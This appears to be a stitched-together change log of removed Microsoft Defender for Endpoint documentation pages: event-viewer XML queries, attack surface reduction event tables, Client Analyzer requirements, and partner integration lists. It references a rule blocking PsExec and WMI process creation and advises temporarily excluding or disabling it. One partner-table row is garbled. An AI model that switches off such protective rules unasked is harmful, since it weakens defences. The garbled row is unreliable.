- <Select Path="Microsoft-Windows-Win32k/Messages">*[System[Provider[@Name='Microsoft-Windows-Security-Mitigations' or @Name='Microsoft-Windows-WER-Diag' or @Name='Microsoft-Windows-Win32k' or @Name='Win32k'] and ( (EventID &gt;= 1 and EventID &lt;= 24) or EventID=5 or EventID=260)]]</Select>
- <Select Path="Microsoft-Windows-Win32k/Operational">*[System[Provider[@Name='Microsoft-Windows-Security-Mitigations' or @Name='Microsoft-Windows-WER-Diag' or @Name='Microsoft-Windows-Win32k' or @Name='Win32k'] and ( (EventID &gt;= 1 and EventID &lt;= 24) or EventID=5 or EventID=260)]]</Select>
- <Select Path="Microsoft-Windows-Win32k/Power">*[System[Provider[@Name='Microsoft-Windows-Security-Mitigations' or @Name='Microsoft-Windows-WER-Diag' or @Name='Microsoft-Windows-Win32k' or @Name='Win32k'] and ( (EventID &gt;= 1 and EventID &lt;= 24) or EventID=5 or EventID=260)]]</Select>
- <Select Path="Microsoft-Windows-Win32k/Render">*[System[Provider[@Name='Microsoft-Windows-Security-Mitigations' or @Name='Microsoft-Windows-WER-Diag' or @Name='Microsoft-Windows-Win32k' or @Name='Win32k'] and ( (EventID &gt;= 1 and EventID &lt;= 24) or EventID=5 or EventID=260)]]</Select>
- <Select Path="Microsoft-Windows-Win32k/Tracing">*[System[Provider[@Name='Microsoft-Windows-Security-Mitigations' or @Name='Microsoft-Windows-WER-Diag' or @Name='Microsoft-Windows-Win32k' or @Name='Win32k'] and ( (EventID &gt;= 1 and EventID &lt;= 24) or EventID=5 or EventID=260)]]</Select>
- <Select Path="Microsoft-Windows-Win32k/UIPI">*[System[Provider[@Name='Microsoft-Windows-Security-Mitigations' or @Name='Microsoft-Windows-WER-Diag' or @Name='Microsoft-Windows-Win32k' or @Name='Win32k'] and ( (EventID &gt;= 1 and EventID &lt;= 24) or EventID=5 or EventID=260)]]</Select>
- <Select Path="System">*[System[Provider[@Name='Microsoft-Windows-Security-Mitigations' or @Name='Microsoft-Windows-WER-Diag' or @Name='Microsoft-Windows-Win32k' or @Name='Win32k'] and ( (EventID &gt;= 1 and EventID &lt;= 24) or EventID=5 or EventID=260)]]</Select>
- <Select Path="Microsoft-Windows-Security-Mitigations/UserMode">*[System[Provider[@Name='Microsoft-Windows-Security-Mitigations' or @Name='Microsoft-Windows-WER-Diag' or @Name='Microsoft-Windows-Win32k' or @Name='Win32k'] and ( (EventID &gt;= 1 and EventID &lt;= 24) or EventID=5 or EventID=260)]]</Select>
- </Query>
-</QueryList>
-```
-
-#### XML for network protection events
-
-```xml
-<QueryList>
- <Query Id="0" Path="Microsoft-Windows-Windows Defender/Operational">
- <Select Path="Microsoft-Windows-Windows Defender/Operational">*[System[(EventID=1125 or EventID=1126 or EventID=5007)]]</Select>
- <Select Path="Microsoft-Windows-Windows Defender/WHC">*[System[(EventID=1125 or EventID=1126 or EventID=5007)]]</Select>
- </Query>
-</QueryList>
-```
-
-### List of attack surface reduction events
-
-All attack surface reduction events are located under **Applications and Services Logs > Microsoft > Windows** and then the folder or provider as listed in the following table.
-
-You can access these events in Windows Event viewer:
-
-1. Open the **Start** menu and type **event viewer**, and then select the **Event Viewer** result.
-
-2. Expand **Applications and Services Logs > Microsoft > Windows** and then go to the folder listed under **Provider/source** in the table below.
-
-3. Double-click on the sub item to see events. Scroll through the events to find the one you're looking.
-
- ![Animation showing using Event Viewer.](media/event-viewer.gif)
--
-|Feature|Provider/source|Event ID|Description|
-|||::||
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|1|ACG audit|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|2|ACG enforce|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|3|Don't allow child processes audit|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|4|Don't allow child processes block|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|5|Block low integrity images audit|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|6|Block low integrity images block|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|7|Block remote images audit|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|8|Block remote images block|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|9|Disable win32k system calls audit|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|10|Disable win32k system calls block|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|11|Code integrity guard audit|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|12|Code integrity guard block|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|13|EAF audit|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|14|EAF enforce|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|15|EAF+ audit|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|16|EAF+ enforce|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|17|IAF audit|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|18|IAF enforce|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|19|ROP StackPivot audit|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|20|ROP StackPivot enforce|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|21|ROP CallerCheck audit|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|22|ROP CallerCheck enforce|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|23|ROP SimExec audit|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|24|ROP SimExec enforce|
-|Exploit protection|WER-Diagnostics|5|CFG Block|
-|Exploit protection|Win32K (Operational)|260|Untrusted Font|
-|Network protection|Windows Defender (Operational)|5007|Event when settings are changed|
-|Network protection|Windows Defender (Operational)|1125|Event when Network protection fires in Audit-mode|
-|Network protection|Windows Defender (Operational)|1126|Event when Network protection fires in Block-mode|
-|Controlled folder access|Windows Defender (Operational)|5007|Event when settings are changed|
-|Controlled folder access|Windows Defender (Operational)|1124|Audited Controlled folder access event|
-|Controlled folder access|Windows Defender (Operational)|1123|Blocked Controlled folder access event|
-|Controlled folder access|Windows Defender (Operational)|1127|Blocked Controlled folder access sector write block event|
-|Controlled folder access|Windows Defender (Operational)|1128|Audited Controlled folder access sector write block event|
-|Attack surface reduction|Windows Defender (Operational)|5007|Event when settings are changed|
-|Attack surface reduction|Windows Defender (Operational)|1122|Event when rule fires in Audit-mode|
-|Attack surface reduction|Windows Defender (Operational)|1121|Event when rule fires in Block-mode|
-
-> [!NOTE]
-> From the user's perspective, attack surface reduction Warn mode notifications are made as a Windows Toast Notification for attack surface reduction rules.
->
-> In attack surface reduction, Network Protection provides only Audit and Block modes.
-
-## Resources to learn more about attack surface reduction
-
-As mentioned in the video, Defender for Endpoint includes several attack surface reduction capabilities. Use the following resources to learn more:
-
-| Article | Description |
-|:|:|
-| [Application control](/windows/security/threat-protection/windows-defender-application-control/windows-defender-application-control) | Use application control so that your applications must earn trust in order to run. |
-| [Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md) | Provides details about each attack surface reduction rule. |
-| [Attack surface reduction rules deployment guide](attack-surface-reduction-rules-deployment.md) | Presents overview information and prerequisites for deploying attack surface reduction rules, followed by step-by-step guidance for testing (audit mode), enabling (block mode) and monitoring. |
-| [Controlled folder access](controlled-folders.md) | Help prevent malicious or suspicious apps (including file-encrypting ransomware malware) from making changes to files in your key system folders (Requires Microsoft Defender Antivirus). |
-| [Device control](device-control-report.md) | Protects against data loss by monitoring and controlling media used on devices, such as removable storage and USB drives, in your organization. |
-| [Exploit protection](exploit-protection.md) | Help protect the operating systems and apps your organization uses from being exploited. Exploit protection also works with third-party antivirus solutions. |
-| [Hardware-based isolation](/windows/security/threat-protection/microsoft-defender-application-guard/md-app-guard-overview) | Protect and maintain the integrity of a system as it starts and while it's running. Validate system integrity through local and remote attestation. Use container isolation for Microsoft Edge to help guard against malicious websites. |
-| [Network protection](network-protection.md) | Extend protection to your network traffic and connectivity on your organization's devices. (Requires Microsoft Defender Antivirus). |
-| [Test attack surface reduction rules](attack-surface-reduction-rules-deployment-test.md) | Provides steps to use audit mode to test attack surface reduction rules. |
-| [Web protection](web-protection-overview.md) | Web protection lets you secure your devices against web threats and helps you regulate unwanted content. |
-
security Overview Client Analyzer https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/overview-client-analyzer.md
- Title: Troubleshoot sensor health using Microsoft Defender for Endpoint Client Analyzer
-description: Troubleshoot sensor health on devices to identify potential configuration, environment, connectivity, or telemetry issue affecting sensor data or capability.
--- NOCSH------ m365-security-- tier3-- mde-ngp-- Previously updated : 02/27/2024--
-# Troubleshoot sensor health using Microsoft Defender for Endpoint Client Analyzer
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-The Microsoft Defender for Endpoint Client Analyzer (MDECA) can be useful when diagnosing sensor health or reliability issues on [onboarded devices](/microsoft-365/security/defender-endpoint/onboard-configure) running either Windows, Linux, or macOS. For example, you may want to run the analyzer on a machine that appears to be unhealthy according to the displayed [sensor health status](/microsoft-365/security/defender-endpoint/fix-unhealthy-sensors) (Inactive, No Sensor Data or Impaired Communications) in the security portal.
-
-Besides obvious sensor health issues, MDECA can collect other traces, logs, and diagnostic information for troubleshooting complex scenarios such as:
--- Application compatibility (AppCompat), performance, network connectivity, or-- Unexpected behavior related to [Endpoint Data Loss Prevention](/microsoft-365/compliance/endpoint-dlp-learn-about).-
-## Privacy notice
--- The Microsoft Defender for Endpoint Client Analyzer tool is regularly used by Microsoft Customer Support Services (CSS) to collect information that will help troubleshoot issues you may be experiencing with Microsoft Defender for Endpoint.--- The collected data may contain Personally Identifiable Information (PII) and/or sensitive data, such as (but not limited to) IP addresses, PC names, and usernames.--- Once data collection is complete, the tool saves the data locally on the machine within a subfolder and compressed zip file.--- No data is automatically sent to Microsoft. If you are using the tool during collaboration on a support issue, you may be asked to send the compressed data to Microsoft CSS using Secure File Exchange to facilitate the investigation of the issue.-
-For more information about Secure File Exchange, see [How to use Secure File Exchange to exchange files with Microsoft Support](/troubleshoot/azure/general/secure-file-exchange-transfer-files)
-
-For more information about our privacy statement, see [Microsoft Privacy Statement](https://privacy.microsoft.com/privacystatement).
-
-## Requirements
--- Before running the analyzer, we recommend ensuring your proxy or firewall configuration allows access to [Microsoft Defender for Endpoint service URLs](configure-environment.md#enable-access-to-microsoft-defender-for-endpoint-service-urls-in-the-proxy-server).--- The analyzer can run on supported editions of [Windows](minimum-requirements.md#supported-windows-versions), [Linux](microsoft-defender-endpoint-linux.md#system-requirements), or [macOS](microsoft-defender-endpoint-mac.md#system-requirements) either before of after onboarding to Microsoft Defender for Endpoint.--- For Windows devices, if you are running the analyzer directly on specific machines and not remotely via [Live Response](/microsoft-365/security/defender-endpoint/troubleshoot-collect-support-log), then SysInternals [PsExec.exe](/sysinternals/downloads/psexec) should be allowed (at least temporarily) to run. The analyzer calls into PsExec.exe tool to run cloud connectivity checks as Local System and emulate the behavior of the SENSE service.-
- > [!NOTE]
- > On Windows devices, if you use the attack surface reduction rule [Block process creations originating from PSExec and WMI commands](attack-surface-reduction-rules-reference.md#block-process-creations-originating-from-psexec-and-wmi-commands), you might want to temporarily [configure an exclusion to the ASR rule](enable-attack-surface-reduction.md#exclude-files-and-folders-from-attack-surface-reduction-rules). Optionally, you can set the rule to **audit** or you can disable the rule. Making these configurations allows the analyzer to run connectivity checks to cloud without being blocked.
-
security Overview Endpoint Detection Response https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/overview-endpoint-detection-response.md
- Title: Overview of endpoint detection and response capabilities-
-description: Learn about the endpoint detection and response capabilities in Microsoft Defender for Endpoint
------- m365-security-- tier2-- mde-edr-- Previously updated : 10/09/2023--
-# Overview of endpoint detection and response
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plans 1 and 2](microsoft-defender-endpoint.md)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Endpoint detection and response capabilities in Defender for Endpoint provide advanced attack detections that are near real-time and actionable. Security analysts can prioritize alerts effectively, gain visibility into the full scope of a breach, and take response actions to remediate threats.
-
-When a threat is detected, alerts are created in the system for an analyst to investigate. Alerts with the same attack techniques or attributed to the same attacker are aggregated into an entity called an _incident_. Aggregating alerts in this manner makes it easy for analysts to collectively investigate and respond to threats.
-
-> [!NOTE]
-> Defender for Endpoint detection is not intended to be an auditing or logging solution that records every operation or activity that happens on a given endpoint. Our sensor has an internal throttling mechanism, so the high rate of repeat identical events don't flood the logs.
-
-> [!IMPORTANT]
-> [Defender for Endpoint Plan 1](defender-endpoint-plan-1.md) and [Microsoft Defender for Business](../defender-business/mdb-overview.md) include only the following manual response actions:
-> - Run antivirus scan
-> - Isolate device
-> - Stop and quarantine a file
-> - Add an indicator to block or allow a file
-
-Inspired by the "assume breach" mindset, Defender for Endpoint continuously collects behavioral cyber telemetry. This includes process information, network activities, deep optics into the kernel and memory manager, user login activities, registry and file system changes, and others. The information is stored for six months, enabling an analyst to travel back in time to the start of an attack. The analyst can then pivot in various views and approach an investigation through multiple vectors.
-
-The response capabilities give you the power to promptly remediate threats by acting on the affected entities.
-
-## See also
--- [Incidents queue](view-incidents-queue.md)-- [Alerts queue](alerts-queue.md)-- [Devices list](machines-view-overview.md)-
security Partner Applications https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/partner-applications.md
- Title: Partner applications in Microsoft Defender for Endpoint-
-description: View supported partner applications to enhance the detection, investigation, and threat intelligence capabilities of the platform
------- m365-security-- tier3- Previously updated : 04/04/2024--
-# Partner applications in Microsoft Defender for Endpoint
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Defender for Endpoint supports third-party applications to help enhance the detection, investigation, and threat intelligence capabilities of the platform.
-
-The support for third-party solutions helps to further streamline, integrate, and orchestrate defenses from other vendors with Microsoft Defender for Endpoint; enabling security teams to effectively respond better to modern threats.
-
-Microsoft Defender for Endpoint seamlessly integrates with existing security solutions. The integration provides integration with the following solutions such as:
--- SIEM-- Ticketing and IT service management solutions-- Managed security service providers (MSSP)-- IoC indicators ingestions and matching-- Automated device investigation and remediation based on external alerts-- Integration with Security orchestration and automation response (SOAR) systems-
-## Supported applications
-
-### Security information and analytics
-
-Logo|Partner name|Description
-:|:|:
-![Logo for AttackIQ.](media/attackiq-logo.png)|[AttackIQ Platform](https://go.microsoft.com/fwlink/?linkid=2103502)|AttackIQ Platform validates Defender for Endpoint is configured properly by launching continuous attacks safely on production assets
-![Logo for Microsoft Sentinel.](media/sentinel-logo.png)|[AzureSentinel](https://go.microsoft.com/fwlink/?linkid=2135705)|Stream alerts from Microsoft Defender for Endpoint into Microsoft Sentinel
-![Logo for Cymulate.](media/cymulate-logo.png)|[Cymulate](https://go.microsoft.com/fwlink/?linkid=2135574)|Correlate Defender for Endpoint findings with simulated attacks to validate accurate detection and effective response actions
-![Logo for Elastic security.](media/elastic-security-logo.png)|[Elastic Security](https://go.microsoft.com/fwlink/?linkid=2139303)|Elastic Security is a free and open solution for preventing, detecting, and responding to threats
-![Logo for IBM QRadar.](media/ibm-qradar-logo.png)|[IBM QRadar](https://go.microsoft.com/fwlink/?linkid=2113903)|Configure IBM QRadar to collect detections from Defender for Endpoint
-![Logo for Micro Focus ArcSight.](media/arcsight-logo.png)|[Micro Focus ArcSight](https://go.microsoft.com/fwlink/?linkid=2113548)|Use Micro Focus ArcSight to pull Defender for Endpoint detections
-![Logo for RSA NetWitness.](media/rsa-netwitness-logo.png)|[RSA NetWitness](https://go.microsoft.com/fwlink/?linkid=2118566)|Stream Defender for Endpoint Alerts to RSA NetWitness using Microsoft Graph Security API
-![Logo for SafeBreach.](media/safebreach-logo.png)|[SafeBreach](https://go.microsoft.com/fwlink/?linkid=2114114)|Gain visibility into Defender for Endpoint security events that are automatically correlated with SafeBreach simulations
-![Logo for Skybox Vulnerability Control.](media/skybox-logo.png)|[Skybox Vulnerability Control](https://go.microsoft.com/fwlink/?linkid=2127467)|Skybox Vulnerability Control cuts through the noise of vulnerability management, correlating business, network, and threat context to uncover your riskiest vulnerabilities
-![Logo for Splunk.](media/splunk-logo.png)|[Splunk](https://go.microsoft.com/fwlink/?linkid=2129805)|The Defender for Endpoint Add-on allows Splunk users to ingest all of the alerts and supporting information to their Splunk
-![Logo for XM Cyber.](media/xmcyber-logo.png)|[XM Cyber](/microsoft-365/compliance/insider-risk-management-configure)|Prioritize your response to an alert based on risk factors and high value assets
--
-### Orchestration and automation
-
-Logo|Partner name|Description
-:|:|:
-![Logo for Fortinet.](media/fortinet-logo.jpg)|[Fortinet FortiSOAR](https://www.fortinet.com/products/fortisoar)|Fortinet FortiSOAR is a holistic Security Orchestration, Automation and Response (SOAR) workbench, designed for SOC teams to efficiently respond to the ever-increasing influx of alerts, repetitive manual processes, and shortage of resources. It pulls together all of organization's tools, helps unify operations and reduces alert fatigue, context switching, and the mean time to respond to incidents.
-![Logo for Delta Risk ActiveEye.](media/delta-risk-activeeye-logo.png)|[Delta Risk ActiveEye](https://go.microsoft.com/fwlink/?linkid=2127468)|Delta Risk, a leading provider of SOC-as-a-Service and security services, integrate Defender for Endpoint with its cloud-native SOAR platform, ActiveEye.
-![Logo for Demisto, a Palo Alto Networks Company.](media/demisto-logo.png)|[Demisto, a Palo Alto Networks Company](https://go.microsoft.com/fwlink/?linkid=2108414)|Demisto integrates with Defender for Endpoint to enable security teams to orchestrate and automate endpoint security monitoring, enrichment, and response
-![Logo for Microsoft Flow & Azure Functions.](media/ms-flow-logo.png)|[Microsoft Flow & Azure Functions](https://go.microsoft.com/fwlink/?linkid=2114300)|Use the Defender for Endpoint connectors for Azure Logic Apps & Microsoft Flow to automating security procedures
-![Logo for Rapid7 InsightConnect.](media/rapid7-logo.png)|[Rapid7 InsightConnect](https://go.microsoft.com/fwlink/?linkid=2116040)|InsightConnect integrates with Defender for Endpoint to accelerate, streamline, and integrate your time-intensive security processes
-![Logo for ServiceNow.](media/servicenow-logo.png)|[ServiceNow](https://go.microsoft.com/fwlink/?linkid=2135621)|Ingest alerts into ServiceNow Security Operations solution based on Microsoft Graph API integration
-![Logo for Swimlane.](media/swimlane-logo.png)|[Swimlane](https://go.microsoft.com/fwlink/?linkid=2113902)|Maximize incident response capabilities utilizing Swimlane and Defender for Endpoint together
-
-### Threat intelligence
-
-Logo|Partner name|Description
-:|:|:
-![Logo for MISP Malware Information Sharing Platform)logo.](media/misp-logo.png)|[MISP (Malware Information Sharing Platform)](https://go.microsoft.com/fwlink/?linkid=2127543)|Integrate threat indicators from the Open Source Threat Intelligence Sharing Platform into your Defender for Endpoint environment
-![Logo for Palo Alto Networks.](media/paloalto-logo.png)|[Palo Alto Networks](https://go.microsoft.com/fwlink/?linkid=2099582)|Enrich your endpoint protection by extending Autofocus and other threat feeds to Defender for Endpoint using MineMeld
-![Logo for ThreatConnect.](media/threatconnect-logo.png)|[ThreatConnect](https://go.microsoft.com/fwlink/?linkid=2114115)|Alert and/or block on custom threat intelligence from ThreatConnect Playbooks using Defender for Endpoint indicators
-
-### Network security
-
-Logo|Partner name|Description
-:|:|:
-![Logo for Aruba ClearPass Policy Manager.](media/aruba-logo.png)|[Aruba ClearPass Policy Manager](https://go.microsoft.com/fwlink/?linkid=2127544)|Ensure Defender for Endpoint is installed and updated on each endpoint before allowing access to the network
-![Logo for Blue Hexagon for Network.](media/bluehexagon-logo.png)|[Blue Hexagon for Network](/training/modules/explore-malware-threat-protection/)|Blue Hexagon has built the industry's first real-time deep learning platform for network threat protection
-![Logo for CyberMDX.](mediX integrates comprehensive healthcare assets visibility, threat prevention and repose into your Defender for Endpoint environment
-![Logo for HYAS Protect.](media/hyas-logo.png)|[HYAS Protect](https://go.microsoft.com/fwlink/?linkid=2156763)|HYAS Protect utilizes authoritative knowledge of attacker infrastructure to proactively protect Microsoft Defender for Endpoint endpoints from cyberattacks
-![Logo for Vectra Network Detection and Response (NDR).](media/vectra-logo.png)|[Vectra Network Detection and Response (NDR)](https://go.microsoft.com/fwlink/?linkid=866934)|Vectra applies AI & security research to detect and respond to cyber-attacks in real time
-
-### Cross platform
-
-Logo|Partner name|Description
-:|:|:
-![Logo for Bitdefender.](media/bitdefender-logo.png)|[Bitdefender](https://go.microsoft.com/fwlink/?linkid=860032)|Bitdefender GravityZone is a layered next generation endpoint protection platform offering comprehensive protection against the full spectrum of sophisticated cyber threats
-![Logo for Better Mobile.](media/bettermobile-logo.png)|[Better Mobile](https://go.microsoft.com/fwlink/?linkid=2086214)|AI-based MTD solution to stop mobile threats & phishing. Private internet browsing to protect user privacy
-![Logo for Corrata.](media/corrata-new.png)|[Corrata](https://go.microsoft.com/fwlink/?linkid=2081148)|Mobile solution - Protect your mobile devices with granular visibility and control from Corrata
-![Logo for Lookout.](media/lookout-logo.png)|[Lookout](https://go.microsoft.com/fwlink/?linkid=866935)|Get Lookout Mobile Threat Protection telemetry for Android and iOS mobile devices
-![Logo for Symantec Endpoint Protection Mobile.](media/symantec-logo.png)|[Symantec Endpoint Protection Mobile](https://go.microsoft.com/fwlink/?linkid=2090992)|SEP Mobile helps businesses predict, detect, and prevent security threats and vulnerabilities on mobile devices
-![Logo for Zimperium.](media/zimperium-logo.png)|[Zimperium](https://go.microsoft.com/fwlink/?linkid=2118044)|Extend your Defender for Endpoint to iOS and Android with Machine Learning-based Mobile Threat Defense
--
-## Other integrations
-
-Logo|Partner name|Description
-:|:|:
-![Logo for Cyren Web Filter.](media/cyren-logo.png)|[Cyren Web Filter](https://www.cyren.com/security-center/url-category-check)|Enhance your Defender for Endpoint with advanced Web Filtering
-![Logo for Morphisec.](media/morphisec-logo.png)|[Morphisec](https://go.microsoft.com/fwlink/?linkid=2086215)|Provides Moving Target Defense-powered advanced threat prevention. Integrates forensics data directly into WD Defender for Cloud dashboards to help prioritize alerts, determine device at-risk score and visualize full attack timeline including internal memory information
-![Logo for THOR Cloud.](media/nextron-thor-logo.png)|[THOR Cloud](https://go.microsoft.com/fwlink/?linkid=862988)|Provides on-demand live forensics scans using a signature base with focus on persistent threats
-
-## SIEM integration
-
-Defender for Endpoint supports SIEM integration through various of methods. This can include specialized SIEM system interface with out of the box connectors, a generic alert API enabling custom implementations, and an action API enabling alert status management.
-
-## Ticketing and IT service management
-
-Ticketing solution integration helps to implement manual and automatic response processes. Defender for Endpoint can help to create tickets automatically when an alert is generated and resolve the alerts when tickets are closed using the alerts API.
-
-## Security orchestration and automation response (SOAR) integration
-
-Orchestration solutions can help build playbooks and integrate the rich data model and actions that Defender for Endpoint APIs exposes to orchestrate responses, such as query for device data, trigger device isolation, block/allow, resolve alert and others.
-
-## External alert correlation and Automated investigation and remediation
-
-Defender for Endpoint offers unique automated investigation and remediation capabilities to drive incident response at scale.
-
-Integrating the automated investigation and response capability with other solutions such as IDS and firewalls help to address alerts and minimize the complexities surrounding network and device signal correlation, effectively streamlining the investigation and threat remediation actions on devices.
-
-External alerts can be pushed to Defender for Endpoint. These alerts are shown side by side with additional device-based alerts from Defender for Endpoint. This view provides a full context of the alert and can reveal the full story of an attack.
-
-## Indicators matching
-
-You can use threat-intelligence from providers and aggregators to maintain and use indicators of compromise (IOCs).
-
-Defender for Endpoint allows you to integrate with these solutions and act on IoCs by correlating rich telemetry to create alerts. You can also use prevention and automated response capabilities to block execution and take remediation actions when there's a match.
-
-Defender for Endpoint currently supports IOC matching and remediation for file and network indicators. Blocking is supported for file indicators.
-
-## Support for non-Windows platforms
-
-Defender for Endpoint provides a centralized security operations experience for Windows and non-Windows platforms, including mobile devices. You'll be able to see alerts from various supported operating systems (OS) in the portal and better protect your organization's network.
security Partner Integration https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/partner-integration.md
- Title: Microsoft Defender for Endpoint partner opportunities and scenarios-
-description: Learn how you can extend existing security offerings on top of the open framework and a rich set of APIs to build extensions and integrations with Microsoft Defender for Endpoint.
------- m365-security-- tier3- Previously updated : 12/18/2020--
-# Microsoft Defender for Endpoint partner opportunities and scenarios
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
--
-Partners can easily extend their existing security offerings on top of the open framework and a rich and complete set of APIs to build extensions and integrations with Defender for Endpoint.
-
-The APIs span functional areas including detection, management, response, vulnerabilities, and intelligence-wide range of use cases. Based on the use case and need, partners can either stream or query data from Defender for Endpoint.
--
-## Scenario 1: External alert correlation and Automated investigation and remediation
-Defender for Endpoint offers unique automated investigation and remediation capabilities to drive incident response at scale.
-
-Integrating the automated investigation and response capability with other solutions such as network security products or other endpoint security products help to address alerts. The integration also minimizes the complexities surrounding network and device signal correlation, effectively streamlining the investigation and threat remediation actions on devices.
-
-Defender for Endpoint adds support for this scenario in the following forms:
--- External alerts can be pushed into Defender for Endpoint and presented side by side with additional device-based alerts from Defender for Endpoint. This view provides the full context of the alert - with the real process and the full story of attack.--- Once an alert is generated, the signal is shared across all Defender for Endpoint protected endpoints in the enterprise. Defender for Endpoint takes immediate automated or operator-assisted response to address the alert.-
-## Scenario 2: Security orchestration and automation response (SOAR) integration
-Orchestration solutions can help build playbooks and integrate the rich data model and actions that Defender for Endpoint APIs expose to orchestrate responses, such as query for device data, trigger device isolation, block/allow, resolve alert, and others.
-
-## Scenario 3: Indicators matching
-Indicator of compromise (IoCs) matching is an essential feature in every endpoint protection solution. This capability is available in Defender for Endpoint and gives the ability to set a list of indicators for prevention, detection, and exclusion of entities. One can define the action to be taken as well as the duration for when to apply the action.
-
-The above scenarios serve as examples of the extensibility of the platform. You aren't limited to the examples and we certainly encourage you to use the open framework to discover and explore other scenarios.
-
-Follow the steps in [Become a Microsoft Defender for Endpoint partner](get-started-partner-integration.md) to integrate your solution in Defender for Endpoint.
-
-## Related article
--- [Overview of management and APIs](management-apis.md)-
security Preferences Setup https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/preferences-setup.md
- Title: Configure general Defender for Endpoint settings
-description: Use the settings page to configure general settings, permissions, apis, and rules.
------- m365-security-- tier2-- essentials-manage-- Previously updated : 01/19/2024--
-# Configure general Defender for Endpoint settings
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-prefsettings-abovefoldlink)
-
-Use the **Settings > Endpoints** menu to modify general settings, advanced features, enable the preview experience, email notifications, and the custom threat intelligence feature.
-
-## In this section
-
-Topic | Description
-:|:
-General settings | Modify your general settings that were previously defined as part of the onboarding process.
-Permissions | Manage portal access using RBAC as well as device groups.
-APIs | Enable the threat intel and SIEM integration.
-Rules | Configure suppressions rules and automation settings.
-Device management | Onboard and offboard devices.
-Network assessments | Choose devices to be scanned regularly and added to the device inventory.
security Prepare Deployment https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/prepare-deployment.md
- Title: Assign roles and permissions
-description: Configure permissions deploying Microsoft Defender for Endpoint
-----
- - m365-security
- - m365solution-endpointprotect
- - m365solution-scenario
- - highpri
- - tier1
-- Previously updated : 12/18/2020--
-# Assign roles and permissions for Microsoft Defender for Endpoint deployment
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
